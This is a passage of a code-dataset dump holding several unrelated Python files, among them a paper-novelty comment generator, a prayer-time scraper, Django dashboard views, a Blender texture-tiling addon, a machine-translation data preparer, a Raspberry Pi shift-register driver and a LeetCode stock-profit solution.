len(t) == 2:\n new_t = t[0] + ' and ' + t[1]\n else:\n new_t = ', '.join(t[:-1]) + ', and ' + t[-1]\n return h, new_t\n\ndef get_repre_r(pair):\n h, t = pair\n t = list(t)\n new_t = ''\n if len(t) == 1:\n new_t = t[0]\n elif len(t) == 2:\n new_t = t[0] + ' and ' + t[1]\n else:\n new_t = ', '.join(t[:-1]) + ', and ' + t[-1]\n # print(new_t, h)\n return new_t, h\ndef get_whole(t):\n new_t = ''\n if len(t) == 1:\n new_t = t[0]\n elif len(t) == 2:\n new_t = t[0] + ' and ' + t[1]\n else:\n new_t = ', '.join(t[:-1]) + ', and ' + t[-1]\n return new_t\n\n\npath = 'data/ORIGINALITY/test.json'\npath_f = 'Novelty.txt'\nwf = open(path_f, 'w')\ncount_ = 0\nidds = []\nwith open(path, 'r') as f:\n for line in tqdm(f):\n data = json.loads(line)\n diff_c, diff_rel, txts_list, c2t, c2num, r2num = data['src']\n score = data['score']\n if len(diff_c) == 0 and len(diff_rel) != 0:\n continue \n output = []\n pid = data['pid']\n output.append('id: ' + pid + ' '+ data['title'] + '\\n')\n output.append('score: ' + str(data['score']) + '\\n')\n real_name = {}\n pair_used_for = defaultdict(set)\n compare = defaultdict(set)\n features = defaultdict(set)\n pair_e = defaultdict(set)\n output.append('Strengths:\\n')\n flag = True\n for h, t, r in diff_rel:\n if r == \"USED-FOR\":\n try:\n if c2t[t] in [\"Method\", \"Material\", \"Metric\"] and c2t[h] == 'Task':\n pair_used_for[h].add(t)\n except:\n pair_used_for[h].add(t)\n\n elif r == 'COMPARE':\n if h != t:\n if h in compare:\n compare[h].add(t)\n else:\n compare[t].add(h)\n elif r == 'FEATURE-OF':\n if h != t:\n features[t].add(h)\n elif r == \"EVALUATE-FOR\":\n try:\n if c2t[t] == \"Method\" and c2t[h] in [\"Material\", \"Metric\"]:\n pair_e[t].add(h)\n except:\n pass\n sorted_relation = []\n r = \"USED-FOR\"\n for h, ts in pair_used_for.items():\n pair = (h, ts)\n score = 0\n for t in ts:\n rel = str((h, t, r))\n score += r2num[rel] \n sorted_relation.append((get_repre(pair), score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n for pair, count in sorted_relation:\n if score > 3:\n output.append('\\tThis paper uses novel %s for %s . \\n' % pair)\n else:\n output.append('\\tThis paper uses %s for %s . \\n' % pair)\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n \n if flag:\n sorted_relation = []\n r = \"COMPARE\"\n for h, ts in compare.items():\n pair = (h, ts)\n score = 0\n for t in ts:\n rel = str((h, t, r))\n if rel not in r2num:\n rel = str((t, h, r))\n score += r2num[rel] \n sorted_relation.append((get_repre(pair), score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n for pair, count in sorted_relation:\n output.append('\\tThe paper compare %s with %s . \\n' % pair)\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n\n if flag:\n sorted_relation = []\n r = 'FEATURE-OF'\n for h, ts in features.items():\n pair = (h, ts)\n score = 0\n for t in ts:\n rel = str((t, h, r))\n score += r2num[rel] \n sorted_relation.append((get_repre_r(pair), score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n for pair, count in sorted_relation:\n output.append('\\tThe paper uses %s for %s . 
\\n' % pair)\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n\n if flag:\n sorted_relation = []\n r = \"EVALUATE-FOR\"\n new_entities = []\n for h, ts in pair_e.items():\n pair = (h, ts)\n score = 0\n new_entities.append(h)\n for t in ts:\n rel = str((t, h, r))\n score += r2num[rel] \n sorted_relation.append((pair, score))\n sorted_relation.sort(key=lambda x: x[1], reverse=True)\n if len(new_entities) > 0:\n output.append('\\tThis paper proposes a new %s. \\n' % get_whole(new_entities))\n\n for pair, count in sorted_relation:\n output.append('\\tThe authors then evaluate %s using %s. \\n' % get_repre(pair))\n # output.append('\\tTerm Frequency:'+ str(count) + '\\n\\n')\n flag = False\n if flag:\n metric = []\n method = []\n task = []\n material = []\n other = []\n for e in diff_c:\n if e not in c2t:\n other.append(e)\n elif c2t[e] == \"Method\":\n method.append(e)\n elif c2t[e] == \"Material\":\n material.append(e)\n elif c2t[e] == \"Metric\":\n metric.append(e)\n elif c2t[e] == 'Task':\n task.append(e)\n else:\n other.append(e)\n method = sorted(method, key=lambda i: c2num[i], reverse=True)\n task = sorted(task, key=lambda i: c2num[i], reverse=True)\n material = sorted(material, key=lambda i: c2num[i], reverse=True)\n o = sorted(other, key=lambda i: c2num[i], reverse=True)\n if score > 3:\n if len(method[:5]) > 0:\n output.append('\\tThe paper proposes novel %s' % get_whole(method[:2] ))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n for m in method[:5]:\n output.append(str(c2num[m])+ ' ')\n for m in task[:5]:\n output.append(str(c2num[m])+ ' ')\n output.append('\\n\\n')\n flag = False\n elif len(other) > 0:\n output.append('\\tThe paper proposes novel%s' % get_whole(other[:2]))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n # for m in other[:2]:\n # output.append(str(c2num[m])+ ' ')\n # for m in task[:1]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n flag = False\n else:\n flag = True\n else:\n if len(method[:5]) > 0:\n output.append('\\tThe paper uses %s' % get_whole(method[:5] ))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n # for m in method[:2]:\n # output.append(str(c2num[m])+ ' ')\n # for m in task[:1]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n flag = False\n elif len(other) > 0:\n output.append('\\tThe paper proposes novel%s' % get_whole(other[:2]))\n\n if len(task) > 0:\n output.append(' for %s.\\n' % task[0])\n else:\n output.append('.\\n')\n # output.append('\\tTerm Frequency:')\n # for m in other[:2]:\n # output.append(str(c2num[m])+ ' ')\n # for m in task[:1]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n flag = False\n else:\n flag = True\n if flag:\n if len(task) > 0:\n output.append('\\tThe paper proposes novel %s .\\n' % get_whole(task[:2]))\n # output.append('\\tTerm Frequency:')\n # for m in task[:2]:\n # output.append(str(c2num[m])+ ' ')\n # output.append('\\n\\n')\n else:\n continue\n \n output.append('\\n')\n output.append('Reference:\\n')\n for txt in data['tgt']:\n output.append(txt + '\\n')\n output.append('\\n\\n\\n')\n idds.append(pid)\n wf.writelines(output)\n count_ += 1\n if count_ %5 == 0:\n wf.write('-'*100)\n wf.write('\\n\\n')\n print(idds)\n idds = [] \nwf.close()","sub_path":"Comment 
Generation/novelty.py","file_name":"novelty.py","file_ext":"py","file_size_in_byte":9878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"201547748","text":"import bs4\nimport requests\n\nurl = 'https://jadwalsholat.pkpu.or.id/?id=266' # url tempat melakukan scraping\ncontents = requests.get(url)\n# print(contents.text)\nresponse = bs4.BeautifulSoup(contents.text, \"html.parser\")\n# bs4 = package, beautifulsoup = class, contents.text = suply contenst yg berisi request yg mengambil url dari web\ndata = response.find_all('tr','table_highlight')\ndata = data[0] # untuk menghilangkan kurung kurawal, agar data di mulai dari data ke 0\n\nsholat = {} # inisialisasi bahwa sholat merupakan dictionary, yg memiliki nama variabel yang memiliki\n # attribute jam sholatnya\ni = 0\nfor d in data:\n if i == 1: # kenapa di deklarasikan data ke 1, karena data ke 0 = tanggalnya\n sholat['shubuh'] = d.get_text()\n elif i == 2:\n sholat['dhuhur'] = d.get_text()\n elif i == 3:\n sholat['ashar'] = d.get_text()\n elif i == 4:\n sholat['maghrib'] = d.get_text()\n elif i == 5:\n sholat['isya'] = d.get_text()\n i += 1\nprint(sholat)\nprint(sholat['ashar'])","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537435134","text":"# coding=utf-8\n# Copyright 2020 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Lint as: python3\n\"\"\"Tests for flax modules.\"\"\"\n\nimport functools\nfrom absl.testing import parameterized\nimport tensorflow.compat.v1 as tf\nfrom protein_lm import domains\nfrom protein_lm import models\nfrom protein_lm import modules\n\nlm_cls = functools.partial(\n models.FlaxLM,\n num_layers=1,\n num_heads=1,\n emb_dim=64,\n mlp_dim=64,\n qkv_dim=64)\n\n\nclass ModulesTest(tf.test.TestCase, parameterized.TestCase):\n\n @parameterized.parameters(\n (modules.AddLearnedPositionalEncodings,),\n (modules.AddSinusoidalPositionalEncodings,))\n def test_positional_encodings(self, positional_encoding_module):\n \"\"\"Tests that the model runs with both types of positional encodings.\"\"\"\n domain = domains.FixedLengthDiscreteDomain(vocab_size=2, length=2)\n lm = lm_cls(domain=domain,\n positional_encoding_module=positional_encoding_module)\n lm.sample(1)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"protein_lm/modules_test.py","file_name":"modules_test.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313630562","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom django.shortcuts import render, redirect\nfrom django.template.defaultfilters import slugify\nfrom .forms import DashboardForm\nfrom .models import Dashboard\nfrom .forms import ContactForm\nfrom django.template.loader import get_template\nfrom django.core.mail 
import EmailMessage, send_mail\nfrom django.template import Context\n\n\n# Create your views here.\n\ndef index(request):\n\n\tdashboards = Dashboard.objects.all()\n\n\treturn render(request, 'collection/index.html', {\n\t\t'dashboards' : dashboards,\n\t\t })\n\ndef dashboard_detail(request, slug):\n\tdashboard = Dashboard.objects.get(slug=slug)\n\n\treturn render(request, 'collection/dashboard_detail.html', {\n\t\t'dashboard' : dashboard,\n\t\t})\n\n@login_required\ndef edit_dashboard(request, slug):\n\tdashboard = Dashboard.objects.get(slug=slug)\n\tif dashboard.user != request.user:\n\t\traise Http404\n\t\t\n\tform_class = DashboardForm\n\n\tif request.method == 'POST':\n\t\tform = form_class(data=request.POST, instance=dashboard)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('dashboard_detail', slug=dashboard.slug)\n\telse:\n\t\tform = form_class(instance=dashboard)\n\n\treturn render(request, 'collection/edit_dashboard.html', {\n\t\t'dashboard' : dashboard,\n\t\t'form' : form,\n\t\t})\n\n\ndef create_dashboard(request):\n\tform_class = DashboardForm\n\n\tif request.method == 'POST':\n\t\tform = form_class(request.POST)\n\t\tif form.is_valid():\n\t\t\tdashboard = form.save(commit=False)\n\t\t\tdashboard.user = request.user\n\t\t\tdashboard.slug = slugify(dashboard.name)\n\n\t\t\tdashboard.save()\n\n\t\t\treturn redirect('dashboard_detail', slug=dashboard.slug)\n\n\n\telse:\n\t\tform = form_class()\n\n\treturn render(request, 'collection/create_dashboard.html', {\n\t\t'form': form,\n\t\t})\n\ndef browse_by_name(request, initial=None):\n\tif initial:\n\t\tdashboards = Dashboard.objects.filter(name__istartswith=initial)\n\t\tdashboards = dashboards.order_by('name')\n\n\telse:\n\t\tdashboards = Dashboard.objects.all().order_by('name')\n\n\treturn render(request, 'collection/search.html', {\n\t\t'dashboards' : dashboards,\n\t\t'initial' : initial,\n\n\n\t\t})\n\n\n#Contact form:\n\ndef contact(request):\n\tform_class = ContactForm\n\n\tif request.method == 'POST':\n\t\tform = form_class(data=request.POST)\n\n\t\tif form.is_valid():\n\t\t\tcontact_name = form.cleaned_data['contact_name']\n\t\t\tcontact_email = form.cleaned_data['contact_email']\n\t\t\tform_content = form.cleaned_data['content']\n\n\t\t\ttemplate = get_template('contact_template.txt')\n\n\t\t\tcontext = Context({\n\t\t\t\t'contact_name' : contact_name,\n\t\t\t\t'contact_email' : contact_email,\n\t\t\t\t'form_content' : form_content,\n\t\t\t})\n\t\t\tcontent = template.render(context)\n\n\t\t\temail = EmailMessage(\n\t\t\t\t'New contact form submission', \n\t\t\t\tcontent, \n\t\t\t\t'Your website ',\n\t\t\t\t['danilopfe@gmail.com'],\n\t\t\t\theaders = {'Reply-To' : contact_email }\n\t\t\t)\n\t\t\temail.send()\n\t\t\treturn redirect('contact')\n\n\treturn render(request, 'collection/contact.html', {\n\t\t'form' : form_class,\n\n\t})\n\n\n","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570933801","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef logistic_loss(x):\n\n return np.log(1 + np.exp(1 - x))\n\n\ndef hinge_loss(x):\n\n tmp = 1 - x\n\n tmp[np.where(tmp <= 0)] = 0\n\n return tmp\n\n\ndef squared_hinge_loss(x):\n\n tmp = 1 - x\n\n tmp[np.where(tmp <= 0)] = 0\n\n return np.square(tmp)\n\n\nx = np.arange(-4, 4, 0.001)\n\nplt.plot(x, logistic_loss(x), 'r')\nplt.plot(x, hinge_loss(x), 'g')\nplt.plot(x, squared_hinge_loss(x), 
'b')\nplt.legend([\"logistic loss\", \"hinge loss\", \"squared hinge loss\"])\nplt.title(\"Loss function\")\nplt.show()\n","sub_path":"machine_learning/loss_function_plot.py","file_name":"loss_function_plot.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"108592616","text":"# MIT License\r\n\r\n# Copyright (c) 2018 shotariya\r\n\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n\r\nimport bpy\r\nimport time\r\nimport math\r\nimport os\r\nfrom PIL import Image\r\n\r\n\r\nclass GenTex(bpy.types.Operator):\r\n bl_idname = 'shotariya.gen_tex'\r\n bl_label = 'Save Textures by UVs'\r\n bl_description = ''\r\n bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}\r\n\r\n def execute(self, context):\r\n start_time = time.time()\r\n scn = context.scene\r\n save_path = scn.tex_path\r\n if not save_path:\r\n self.report({'ERROR'}, 'Please select Folder for Combined Texture')\r\n return {'FINISHED'}\r\n bpy.ops.shotariya.uv_fixer()\r\n work = []\r\n for obj in context.scene.objects:\r\n if obj.type == 'MESH':\r\n if not obj.data.uv_layers.active:\r\n continue\r\n mat_len = len(obj.material_slots)\r\n mat_info = [[] for x in range(mat_len)]\r\n tex_info = [[] for x in range(mat_len)]\r\n for face in obj.data.polygons:\r\n face_coords = [obj.data.uv_layers.active.data[loop_idx].uv for loop_idx in face.loop_indices]\r\n mat_info[face.material_index].append(face_coords)\r\n for mat, faces in enumerate(mat_info):\r\n x_list = [math.ceil(poly.x) for face in faces for poly in face if not math.isnan(poly.x)]\r\n y_list = [math.ceil(poly.y) for face in faces for poly in face if not math.isnan(poly.y)]\r\n tex_info[mat] = [max(x_list), max(y_list)]\r\n for index in range(mat_len):\r\n mat = obj.material_slots[index].material\r\n tex_slot = mat.texture_slots[0]\r\n if tex_slot:\r\n if (tex_info[index][0] > 1) or (tex_info[index][1] > 1):\r\n tex = tex_slot.texture\r\n if tex:\r\n if tex.to_save:\r\n tex_info[index].append(bpy.path.abspath(tex.image.filepath))\r\n tex_info[index].append(mat)\r\n if len([True for info in tex_info if len(info) > 2]) != 0:\r\n work.append(True)\r\n for info in tex_info:\r\n if len(info) > 3:\r\n img_name = info[2].split(os.sep)[-1].split('.')[0]\r\n img = Image.open(info[2])\r\n w, h = img.size\r\n if info[0] == 0:\r\n info[0] = 1\r\n if info[1] == 0:\r\n info[1] = 1\r\n if info[0] > 64:\r\n info[0] = 1\r\n if info[1] > 64:\r\n info[1] = 1\r\n 
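# Tile the source image info[0] x info[1] times so UV coordinates outside the 0-1 square still sample the texture\r\n                            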
result = Image.new('RGBA', (w * info[0], h * info[1]))\r\n for i in range(info[0]):\r\n for j in range(info[1]):\r\n x = i * w\r\n y = j * h\r\n result.paste(img, (x, y, x + w, y + h))\r\n result.save('{}{}{}_uv.png'.format(save_path, os.sep, img_name), 'PNG')\r\n mat = info[3]\r\n mat_index = 0\r\n for index in range(mat_len):\r\n if obj.material_slots[index].material == mat:\r\n mat_index = index\r\n tex_slot = mat.texture_slots[0]\r\n tex = tex_slot.texture\r\n tex.image = bpy.data.images.load('{}{}{}_uv.png'.format(save_path, os.sep, img_name))\r\n for face in obj.data.polygons:\r\n if face.material_index == mat_index:\r\n face_coords = [obj.data.uv_layers.active.data[loop_idx].uv for loop_idx in\r\n face.loop_indices]\r\n for z in face_coords:\r\n z.x = z.x / info[0]\r\n z.y = z.y / info[1]\r\n if not work:\r\n self.report({'ERROR'}, 'All Selected texture UVs bounds are 0-1')\r\n return {'FINISHED'}\r\n bpy.ops.shotariya.list_actions(action='GENERATE_MAT')\r\n bpy.ops.shotariya.list_actions(action='GENERATE_TEX')\r\n print('{} seconds passed'.format(time.time() - start_time))\r\n self.report({'INFO'}, 'Textures were created.')\r\n return{'FINISHED'}\r\n","sub_path":"gen_tex.py","file_name":"gen_tex.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300736311","text":"import numpy as np\n\nclass PrepareData:\n\n def __init__(self):\n pass\n\n def read_files(self, path, num_samples):\n input_texts = []\n target_texts = []\n input_words = set([])\n target_words = set([])\n\n with open(path, 'r', encoding='utf-8') as file:\n lines = file.readlines()\n for line in lines[: min(num_samples, len(lines) -1)]:\n input_text, target_text = line.split(\"\\t\")[:2]\n target_text = '\\t' + target_text + '\\n'\n input_texts.append(input_text)\n target_texts.append(target_text)\n\n for word in input_text.split(\" \"):\n if word not in input_words:\n input_words.add(word)\n for word in target_text.split(\" \"):\n if word not in target_words:\n target_words.add(word)\n\n return input_texts, target_texts, input_words, target_words\n\n def vocab_generation(self, path, num_samples):\n\n input_texts, target_texts, input_words, target_words = self.read_files(path, num_samples)\n input_words = sorted(list(input_words))\n target_words = sorted(list(target_words))\n self.num_encoder_words = len(input_words)\n self.num_decoder_words = len(target_words)\n self.max_encoder_seq_length = max([len(text.split(\" \")) for text in input_texts])\n self.max_decoder_seq_length = max([len(text.split(\" \")) for text in target_texts])\n\n self.input_word_index = dict([(word ,i) for i, word in enumerate(input_words)])\n self.target_word_index = dict([(word ,i) for i, word in enumerate(target_words)])\n self.reverse_input_word_dict = dict((i,word) for word, i in self.input_word_index.items())\n self.reverse_target_word_dict = dict((i,word) for word, i in self.target_word_index.items())\n\n def process_inputs(self, input_texts, target_texts=None):\n encoder_input_data = np.zeros((len(input_texts), self.max_encoder_seq_length, self.num_encoder_words), dtype='float32')\n decoder_input_data = np.zeros((len(input_texts), self.max_decoder_seq_length, self.num_decoder_words), dtype='float32')\n decoder_target_data = np.zeros((len(input_texts), self.max_decoder_seq_length, self.num_decoder_words), dtype='float32')\n\n if self.mode == 'train':\n for i,(input_text, target_text) in enumerate(zip(input_texts, target_texts)):\n for t, word in 
enumerate(input_text.split(\" \")):\n try:\n encoder_input_data[i, t, self.input_word_index[word]] = 1.\n except:\n print(f'word {word} encountered for the 1st time, skipped')\n for t, word in enumerate(target_text.split(\" \")):\n decoder_input_data[i, t, self.target_word_index[word]] = 1.\n if t > 0:\n try:\n decoder_target_data[i,t-1, self.target_word_index[word]] = 1.\n except:\n print(f'word {word} encountered for the 1st time, skipped')\n return encoder_input_data, decoder_input_data, decoder_target_data, np.array(input_texts), np.array(target_texts)\n else:\n for i, input_text in enumerate(input_texts):\n for t, word in enumerate(input_text.split(\" \")):\n try:\n encoder_input_data[i, t, self.input_word_index[word]] = 1.\n except:\n print(f'word {word} encountered for the 1st time, skipped')\n\n return encoder_input_data, None, None, np.array(input_texts), None\n\n\n\n\n\n\nif __name__ == \"__main__\":\n prepare_data = PrepareData()\n # read_files returns four values (texts and vocabularies), so unpack all of them\n input_texts, target_texts, input_words, target_words = prepare_data.read_files('./fra.txt', 10e13)\n print(input_words)\n print(target_words)\n\n","sub_path":"NMT_data_preperation.py","file_name":"NMT_data_preperation.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448148367","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nfrom natasha import NamesExtractor\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = []\r\ntitles = []\r\ndic = {}\r\n\r\nextractor = NamesExtractor()\r\nr = requests.get('https://yandex.ru/news/export')\r\nhtml = BeautifulSoup(r.content, \"html.parser\")\r\ndata = html.find_all('a', class_=\"link link_theme_normal i-bem\")\r\nfor i in range(len(data)):\r\n data[i] = str(data[i])\r\n index1 = data[i].find(\"href\", 0, len(data[i]))\r\n index2 = data[i].find(\"rss\", 0, len(data[i]))\r\n r = requests.get(data[i][index1 + 6:index2 + 3])\r\n data[i] = BeautifulSoup(r.content, \"html.parser\")\r\n data[i] = str(data[i].findAll('title'))\r\n titles.append(extractor(data[i]))\r\n for match in titles[i]:\r\n start, stop = match.span\r\n if (dic.get(data[i][start:stop], -1) == -1):\r\n dic[data[i][start:stop]] = 1\r\n else:\r\n dic[data[i][start:stop]] += 1\r\ngis = plt.subplot()\r\ngis.bar(dic.keys(), dic.values())\r\nplt.show()\r\n","sub_path":"news_collection.py","file_name":"news_collection.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"420870279","text":"#!/usr/bin/python3\n\nimport pigpio # using this for hardware PWM, software is not stable!!!\nimport signal\nimport time\nimport math\nimport RPi.GPIO as GPIO # using RPi.GPIO for non-PWM\nimport random\n\n# GPIO pin numbers\nSTR = 17\nDATA = 27\nCLK = 22\nPWM_PIN = 12\nPWM_FREQ = 400 # frequency of PWM\nCHANNELS = 32; # number of output channels\nFPS = 30; # main refresh rate = frames per second\ncounter = 0\nvalue = 0b11111111111111111111111111111111 # testing purposes\n\n\nPWM = pigpio.pi()\nif not PWM.connected:\n\texit()\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(STR, GPIO.OUT, initial=GPIO.LOW) # make pin into an output\nGPIO.setup(DATA, GPIO.OUT, initial=GPIO.LOW) # make pin into an output\nGPIO.setup(CLK, GPIO.OUT, initial=GPIO.LOW) # make pin into an output\n\ndef regClear():\n\tGPIO.output(DATA, 0)\n\tfor i in 
range(CHANNELS):\n\t\tGPIO.output(CLK, 0)\n\t\tGPIO.output(DATA, value >> (CHANNELS - i - 1) & 1)\n\t\tGPIO.output(CLK, 1)\n\tGPIO.output(CLK, 0)\n\tGPIO.output(STR, 1)\n\tGPIO.output(STR, 0)\n\tGPIO.output(DATA, 0)\n\ndef keyboardInterruptHandler(signal, frame):\n\tprint()\n\tprint(\"KeyboardInterrupt (ID: {}) has been caught. Cleaning up...\".format(signal))\n\tregClear()\n\tGPIO.cleanup()\n\tPWM.hardware_PWM(PWM_PIN, PWM_FREQ, 0)\n\tPWM.stop()\n\texit(0)\n\ndef main():\n\n\tprint(\"Ctrl C to quit\")\n\n\tglobal counter\n\tglobal value\n\n\tregClear()\n\n\twhile True:\n\n\t\tregOutput( 1 << (counter % 32) )\n\n\t\tif (counter % 300 == 150):\n\t\t\tPWM.hardware_PWM(PWM_PIN, PWM_FREQ, 1000000 )\n\t\telif (counter % 300 == 0):\n\t\t\tPWM.hardware_PWM(PWM_PIN, PWM_FREQ, 100000 )\n\n\t\tcounter += 1\n\t\ttime.sleep(1)\n\nsignal.signal(signal.SIGINT, keyboardInterruptHandler)\n\nmain()","sub_path":"Python/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360792806","text":"# Modules\nimport os\nimport csv\n\n#Set up path for file\ncsvpath=os.path.join(\"..\", \"Resources\", \"budget_data.csv\" )\n#print(csvpath)\n\ntotal_months=0\ntotal_profit=0\nprevious_value=0\ncurrent_value=0\nlist_changes=[]\nlist_dates=[]\n\nprint(\"Financial Analysis\")\nprint(\"---------------------\")\n\n#Open the csv file\nwith open(csvpath, newline='') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=',')\n#print(csvreader)\n\n#Read the header row\n csv_header=next(csvreader)\n#print(f\"CSV Header: {csv_header}\")\n\n#Read each row of data after the header\n for row in csvreader:\n\n #Determine total number of months\n total_months=total_months+1\n #current_value=(row[0])\n\n #Determine total profit over entire period\n total_profit=total_profit+int(row[1])\n current_value=int(row[1])\n\n # Calculate the average of the changes in Profit/Lossess over the entire period, first calculate change\n monthly_diff=current_value-previous_value\n \n #Store changes in list\n list_changes.append(monthly_diff)\n \n #Store dates in list\n list_dates.append(row[0])\n \n previous_value=current_value\n #avg_monthly_diff=sum[list_changes]\n\ndel list_changes[0]\ndel list_dates[0]\n#print(list_changes)\n#print(list_dates)\n\n# Calculate the average of the changes in Profit/Lossess over the entire period\naverage = sum(list_changes) / len(list_changes)\n\n# Determine the greatest increase in profits (date and amount) over the entire period\nmaximum=list_changes.index(max(list_changes))\n\n# Determine the greatest decrease in losses (datea and amount) ove the entire period\nminimum=list_changes.index(min(list_changes))\n\nprint(\"Total Months: \" + str(total_months))\nprint(\"Total: $\"+str(total_profit))\nprint(\"Average Change: $\" +str(round(average, 2)))\nprint(\"Greatest Increase in Profits: \" + str(list_dates[maximum]) +\" \"+str(list_changes[maximum]))\nprint(\"Greatest Decrease in Profits: \" + str(list_dates[minimum]) +\" \"+ str(list_changes[minimum]))\n#print(list_changes)\n\n#print(row)","sub_path":"PyBank/Homework/main_1.py","file_name":"main_1.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"74518575","text":"# coding=utf-8\r\n\r\n\"\"\"\r\n309. 
Best Time to Buy and Sell Stock with Cooldown My Submissions QuestionEditorial Solution\r\nTotal Accepted: 13833 Total Submissions: 37785 Difficulty: Medium\r\nSay you have an array for which the ith element is the price of a given stock on day i.\r\n\r\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (ie, buy one and sell one share of the stock multiple times) with the following restrictions:\r\n\r\nYou may not engage in multiple transactions at the same time (ie, you must sell the stock before you buy again).\r\nAfter you sell your stock, you cannot buy stock on next day. (ie, cooldown 1 day)\r\nExample:\r\n\r\nprices = [1, 2, 3, 0, 2]\r\nmaxProfit = 3\r\ntransactions = [buy, sell, cooldown, buy, sell]\r\nhttps://discuss.leetcode.com/topic/31349/7-line-java-only-consider-sell-and-cooldown\r\n\"\"\"\r\n\r\n\r\nclass Solution(object):\r\n def maxProfit(self, prices):\r\n \"\"\"\r\n :type prices: List[int]\r\n :rtype: int\r\n \"\"\"\r\n if prices is None or len(prices) <= 1:\r\n return 0\r\n if len(prices) == 2:\r\n return max(prices[1] - prices[0], 0)\r\n profit1 = 0\r\n profit2 = 0\r\n for i in range(1, len(prices)):\r\n copy = profit1\r\n profit1 = max(profit1 + prices[i] - prices[i - 1], profit2)\r\n profit2 = max(copy, profit2)\r\n\r\n return max(profit1, profit2)\r\n\r\n\r\nif __name__ == '__main__':\r\n print ((Solution().maxProfit([1, 2, 3, 0, 2, 4])))\r\n","sub_path":"zishell/solution/medium/solution309_maxProfit.py","file_name":"solution309_maxProfit.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347635577","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*\nfrom os.path import basename\nfrom unittest import main, TestCase\nfrom assert_is import *\nfrom pgvcsddl import ddl, parent_path\n\n\nclass Test(TestCase):\n def test(self):\n path=\"SCHEMA/public/TABLE/tablename\"\n oid=88\n sql=\"sql\"\n _ddl=ddl(path=path,oid=oid,sql=sql)\n eq_(_ddl.files[\"%s.oid\" % path],oid)\n eq_(_ddl.files[\"%s.sql\" % path],sql)\n refs=[parent_path(path)]\n eq_(_ddl.files[\"%s.references\" % path],\"\\n\".join(refs))\n\nif __name__ == \"__main__\":\n 